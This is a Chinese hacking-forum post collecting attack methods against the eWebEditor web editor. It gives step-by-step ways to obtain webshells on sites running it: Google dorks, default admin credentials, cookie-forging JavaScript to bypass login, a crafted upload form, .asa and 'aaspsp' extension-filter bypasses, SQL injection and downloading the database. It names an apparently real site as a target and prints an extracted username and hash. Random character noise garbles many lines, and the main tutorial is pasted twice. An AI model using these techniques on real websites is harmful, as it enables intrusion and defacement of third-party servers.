eWebEditor.asp?id=45&style=standard1 样式调用
! q, i" u$ S; p% Z; d7 U8 A. {* g' F& i$ h) r
$ X p) D' l S0 T7 ?6 n0 E8 f+ x/edit/admin_uploadfile.asp?id=14&dir=../../..7 l; X$ M4 E4 |2 f( R6 O
可以浏览网站目录 ../自己加或者减
% k0 }3 y2 e* H: b+ s9 E+ n0 T$ R* L0 a8 U" F2 y
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞: B1 x3 n* U- n8 t- { W
简单利用就是2 b) s* H8 V# O% C& C: v' o8 C S
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200$ t. @/ F; ]9 l1 p/ M2 t- v! Z! F
http://www.siqinci.com/ewebedito ... amp;style=full_v200$ z+ I# i! }2 o) f, W( \+ |& y1 I2 r
可以利用nbsi进行猜解,对此进行注入
( J9 N0 Y; o+ ` t还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的# j0 n" t0 [) H) I D) | H
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
, s y' \' y2 v) t* F在action下面
( s5 ~/ J2 l' Y) j' s* {<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">3 B3 V6 `2 Y! l. \ D0 g% `" X
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
\# |$ s/ v0 M: ]) g; ~<input type="submit" name="uploadfile" value="提交">
5 C. H8 F5 X9 N5 S7 h# e, F<input type=hidden name=originalfile value="">
! b% X, n" n6 u" _4 c</form>% h8 y' q% X3 E
------------------------------------------------------------------------------------------------------------------------------------------------
2 i2 _- ~6 B% b( [<input type="submit" name="uploadfile" value="提交"> 放在action后头
" J" U8 K' V8 D! j, u+ g V,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。2 Q& D( n( ^/ m6 o* _7 ~( t6 W
% o9 e; \" ~: ^9 }, u$ h
+ z0 z6 E% i$ c d K* _: ~! Z. W/ u) U, e( h
/ I% ]- d. ]2 s. k
Ewebeditor最新漏洞及漏洞大全[收集] (图)! S7 H/ ~: H& p5 {4 I: K+ ^
本帖最后由 administrator 于 2009-7-7 21:24 编辑
# J: Q2 w4 N3 M0 A9 m R. H4 k) G+ O5 a+ p
以下文章收集转载于网络
) m% K: u1 q/ h0 H9 n9 A#主题描述# ewebeditor 3.8漏洞[php]
1 N, ~. K/ l$ l( \- d( p9 x--------------------------------------------------------------------------------------------
N) U5 `7 Y8 K#内容#5 Z1 ~1 ]- ^1 M; U: u
php版ewebeditor 3.8的漏洞3 f4 g9 X: m: S9 j5 p
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:( a* o, Z9 ^7 \! R3 B" b
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
1 h+ {" D5 a' X" b% ~. h2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
- U3 Q7 J! A2 C) a, \1 P" p3 后面的利用和asp一样,新增样式修改上传,就ok了
; F2 W& D1 J3 y, W/ [测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
Q2 a8 H( Y4 p' f6 _aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell+ R4 }+ G3 @0 K. z# i( B4 T
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
! d+ p5 d$ g I2 E6 Y5 `! i--------------------------------------------------------------------------------------------6 t4 d7 n) K! M. s) Q$ Z+ z/ i
' a3 K# Y: i/ S& k1 j
! E3 s$ s9 D" L5 T0 y1 [算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。( X% t: S! u3 w; X
, q9 {6 C9 U% h- C3 H$ _5 L漏洞更新日期TM: 2009 2 9日 转自zake’S Blog% o% U1 X' o3 E: w( G) z
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
) q3 \! k' `- ~3 m那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址4 ` Y8 o2 Q9 T' z
1 r, N0 L ~6 q' P! k# R7 t/ J
$ F/ A0 `( o+ {$ S, G9 N3 u" E然后确定以后,这里是最关键的一部!' q* V" W2 N- e' U A- B
这里点了远程上传以后,再提交得到木马地址
: x* c$ x+ f. p5 O$ S3 m由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限/ l7 d! C: A, D! D. E3 V5 e
属于安全检测漏洞版本ewebeditor v6.0.0
& z0 p7 T, c4 V& s8 g1 o6 f" H$ I9 s& C: ^4 m2 j: e
以前的ewebeditor漏洞:
5 H( I8 G& N7 D1 Z! I8 k4 b7 J
6 F$ j* w2 Z0 A, D+ l& u; s8 P# W' xewebeditor注入漏洞, I4 M2 V5 C+ J! G
- ]' f1 o- p+ O1 F5 U
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb& E6 L5 G3 ]+ T# N, }. E( ~
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
2 U& v v, [6 D( p! u5 P% u今天我给大家带来的也是ewebeditor编辑器的入侵方法7 T3 Y0 h. U' A! n7 c
不过一种是注入,一种是利用upload.asp文件,本地构造2 Z4 }* S9 s0 J# r
NO1:注入 x6 Y+ S4 h9 ]6 n( D
http://www.XXX.com/ewebeditor200 ... amp;style=full_v200
" S7 H4 j0 L. M% S3 S编辑器ewebedior7以前版本通通存在注入1 C3 y2 }. K+ k" _, |4 u
直接检测不行的,要写入特征字符
& n2 k! \+ f2 s1 f" i, [) }! T我们的工具是不知道ewebeditor的表名的还有列名- R- q5 Z9 b- k8 S9 J
我们自己去看看5 u) M- U! S" O f/ X
哎。。先表吧
* H7 M d2 P+ b- F0 U& s要先添加进库
$ Y. B$ e( b2 c) `- S6 v$ f开始猜账号密码了
2 t5 f1 q4 ^/ n3 t" N我们==7 w3 m' o, _! o
心急的往后拉
) A: a* `" B! H' m/ j出来了8 W0 k$ F0 A$ F
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120: I" @1 W7 l9 b0 o' T1 ]' |! \* C
对吧^_^) a9 E7 S! @ a/ W Q: D
后面不说了! C3 s, x( H) [9 n% T2 c8 Y9 v
NO2:利用upload.asp文件,本地构造上传shell
0 U0 g1 Z2 x& o7 X大家看这里
4 m5 i5 q. w" ^, t/ n8 j( L$ f8 ?http://www.siqinci.com/ewebedito ... lepreview&id=37
- u* u4 P% a4 p4 @( b, G如果遇见这样的情况又无法添加工具栏是不是很郁闷
: ?* R; d7 O6 p( C3 B% b现在不郁闷了,^_^源源不一般
# ^, ?, w. E5 J1 O9 e我们记录下他的样式名“aaa”0 `2 V5 |( P7 r9 D8 W
我已经吧upload.asp文件拿出来了
/ X& _/ T' S% g% z我们构造下5 l) q7 m1 c* ?
OK,我之前已经构造好了3 _( i# I& Q. d3 p" M
其实就是这里
1 M+ L( i: z- D; z<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>; U. w8 o+ x2 h" b# e% |% I# ^
<input type=file name=uploadfile size=1 style=”width:100%”>
3 s1 _ {2 `0 Z! T/ W<input type=submit value=”上传了”></input>
( O" t9 f- D" N; q</form>
9 m- W$ R( w+ [) G下面我们运行他上传个大马算了
' G" M' a4 C1 ^" Q3 F0 O2 WUploadFile上传进去的在这个目录下9 p8 e: h, D8 r/ V4 ~
2008102018020762.asa# b; U6 q0 f$ q, S
+ g, g- z% I1 U
过往漏洞:
5 @) q2 b. }% P* U5 _8 p- q; n) W; C, W" u7 b2 A- o7 Z, l% H, S8 \! g7 U
首先介绍编辑器的一些默认特征:
4 o. Y) u( m4 ?1 I8 O默认登陆admin_login.asp. K5 ^! k7 N0 T. Y# M2 x
默认数据库db/ewebeditor.mdb
8 V5 B+ c7 p4 ^) ^默认帐号admin 密码admin或admin888/ j" D! B6 z5 p1 X8 h
搜索关键字:”inurl:ewebeditor” 关键字十分重要
4 v8 P4 {! L5 E- Q0 O有人搜索”eWebEditor - eWebSoft在线编辑器”
- F. o4 R! L3 t3 a根本搜索不到几个~3 H* }! E' n+ A! _9 F* L0 f3 E3 E6 O: _
baidu.google搜索inurl:ewebeditor
+ m$ u5 V1 x* q3 W- h6 Y几万的站起码有几千个是具有默认特征的~" D3 T+ r9 }1 m7 X c- W
那么试一下默认后台" o; n) D. o6 }% b& o+ d
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
/ T9 e( n; ^* y' e" X8 Q试默认帐号密码登陆。& F/ G2 ^$ r8 H/ C1 [7 I1 f
利用eWebEditor获得WebShell的步骤大致如下:
( W% U: F" O% n5 J, q( j1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。; n7 h% b4 R: ~# [; k% y
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
: v) m+ @. ` h( r+ O% j. O* B3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。- o+ }0 z L& J; _$ a
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
$ y( |& p. i% q6 r% z6 ?% p4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。4 g5 n7 H/ a5 X3 u. Q
然后在上传的文件类型中增加“asa”类型。9 R) U+ ^% _# Q6 `
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
- B. m# R- w; {$ C. [7 ~) C漏洞原理( I; Z3 p; O) Y' _1 }% U
漏洞的利用原理很简单,请看Upload.asp文件:
1 @& ^7 u* A$ [% T I任何情况下都不允许上传asp脚本文件
/ a) ^" y+ I9 ]' e- csAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)2 k8 v8 @/ D$ H$ l
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!+ p- ]. O2 o8 G# L" P* h* t
高级应用& v1 j+ S2 \8 z L) t2 B, J- s$ N
eWebEditor的漏洞利用还有一些技巧:
) o2 A& f7 m( k- a1.使用默认用户名和密码无法登录。' b, j3 |. f( u
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。5 `2 t/ Y4 e ]5 J8 i6 r
2.加了asa类型后发现还是无法上传。
: V* c) e/ Q5 O, C H应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:4 [% Z+ O- r7 e8 R0 I& }; j# q- h
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
( t% @1 H# d0 Q7 u7 ?# A, P猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
' r0 _3 J( ^+ i: b/ l6 ]& K3.上传了asp文件后,却发现该目录没有运行脚本的权限。- h7 c w* v& ?, |. `3 y
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
; N, P& `" U8 F( ~% K n) f4 b' b4.已经使用了第2点中的方法,但是asp类型还是无法上传。
! [. Z! R; U) ^看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
) y& r4 T6 a* M! O; L后记
, [# O" U$ Y/ u6 G/ }根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
) B, w; s8 E) `; @4 R( H基本入侵基础漏洞$ N- ~8 z6 g/ C+ x5 ]" M
eWebEditor 漏洞1 q+ K4 @% q! @
; k7 [: z% _! W# v各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! - h+ c" J" B" K( R. ]! b# U3 @# o
, F0 P5 s. I% @% S. ~# j- p漏洞利用
( P# e2 R/ c, g3 }9 l7 i利用eWebEditor获得WebShell的步骤大致如下:0 O! q1 P# w& m8 s0 P7 {- Z, R
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。! }1 g/ c/ n; c. ^3 q
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。" l7 k8 a, P1 F2 ?
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
) J3 ^7 h1 E( x$ X如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!1 ]( s# Y- [! e+ x. X- j2 [. S
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
+ S4 M( S" m+ i$ G r" r: C; Z# V: c4 y; ]0 f+ G' a3 M2 B
然后在上传的文件类型中增加“asa”类型。$ @. C( ~! d+ q5 W
: \ R* }0 X# M( m$ f! u8 |, Y5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
; G( h7 K }( ]7 W2 i' N) ]6 S* P* B2 a7 _2 y6 ?( l
U. G! M: t7 y2 b- y: a2 J漏洞原理
4 n2 q! n% |' W$ e9 h8 D漏洞的利用原理很简单,请看Upload.asp文件:+ ^$ B8 Q' V" @7 Q- j9 t
任何情况下都不允许上传asp脚本文件 [& W- w$ o" V
sAllowExt = replace(UCase(sAllowExt), "ASP", "")
* m2 z% I) k/ t' d/ f v因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!4 v! s- S" C _: J8 t8 V' f
5 z2 \( a" X5 D0 @/ R: ^& F高级应用1 @( _& f6 B; L$ v5 t5 q2 V7 W
eWebEditor的漏洞利用还有一些技巧:
$ k* N5 p) D! \3 U( b1 U$ B; d1.使用默认用户名和密码无法登录。" |8 }% L2 G6 i/ _8 w
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
, X; N- y+ g1 L$ q2.加了asa类型后发现还是无法上传。# l$ w% f& ^# l, c1 l
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:* _/ W5 C# p5 x2 N4 x; V/ `- m
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")& @* J7 ^3 S n. Z$ ?
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。! H4 |! U& @# R4 {; G
3.上传了asp文件后,却发现该目录没有运行脚本的权限。" ?; @6 h- `$ y/ t; v7 _$ h+ T
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
& E9 h. ^0 m0 j; S1 B4.已经使用了第2点中的方法,但是asp类型还是无法上传。# g) [" A' a4 _1 \1 H
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。' O) H* \5 a8 R
; k7 o! y7 A7 g& {9 t& V8 M9 q J/ Z后记
% f1 ^5 b4 g9 v* S4 x根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对